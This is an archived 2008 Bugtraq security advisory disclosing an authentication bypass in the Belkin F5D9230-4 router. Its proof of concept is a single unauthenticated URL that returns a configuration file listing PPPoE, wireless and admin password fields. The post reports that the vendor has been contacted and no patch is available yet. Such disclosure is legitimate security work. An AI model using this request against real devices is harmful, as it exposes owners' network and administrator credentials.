lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080119202921.4870.qmail@securityfocus.com>
Date: 19 Jan 2008 20:29:21 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Belkin Wireless G Plus MIMO Router F5D9230-4 Authentication
 Bypass Vulnerability

##
## VULNERABILITY:
##
##  Belkin Wireless G Plus MIMO Router F5D9230-4
##  Authentication Bypass Vulnerability
##
##
## AUTHOR:
##
##  DarkFig < gmdarkfig (at) gmail (dot) com >
##  http://acid-root.new.fr/?0:17
##  #acidroot@....wordlnet.com
##
##
## INTRODUCTION:
##
##  I recently bought this router for my local
##  network (without modem integrated), now I can tell
##  that it was a bad choice. When my ISP disconnects
##  me from internet, in the most case I have to reboot
##  my Modem and the Router in order to reconnect.
##  So I coded a program (which send http packets) to reboot
##  my router, it asks me the router password, and reboots it.
##  One day I wrote a bad password, but it worked. So I
##  decided to make some tests in order to see if there was
##  a vulnerability.
##
##
## DESCRIPTION:
##
##  Apparently when we the router starts, it create a file
##  (without content) named user.conf, then when we go to
##  SaveCfgFile.cgi, the configuration is save to the file
##  user.conf. But the problem is that we can access
##  (and also change) to the file SaveCfgFile.cgi without
##  login.
##
##
## PROOF OF CONCEPT:
## 
##  For example we can get the configuration file here:
##  http://<ROUTER_IP>/SaveCfgFile.cgi
## 
##  pppoe_username=...
##  pppoe_password=...
##  wl0_pskkey=...
##  wl0_key1=...
##  mradius_password=...
##  mradius_secret=...
##  httpd_password=...
##  http_passwd=...
##  pppoe_passwd=...
##
##
##  Tested on the latest firmware for this product
##  (version 3.01.53). 
##
##
## PATCH
##  
##  Actually there is no firmware update, but I contacted the
##  author, if they'll release a patch, it will be available here:
##  http://web.belkin.com/support/download/download.asp
##  ?download=F5D9230-4&lang=1&mode=
##

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ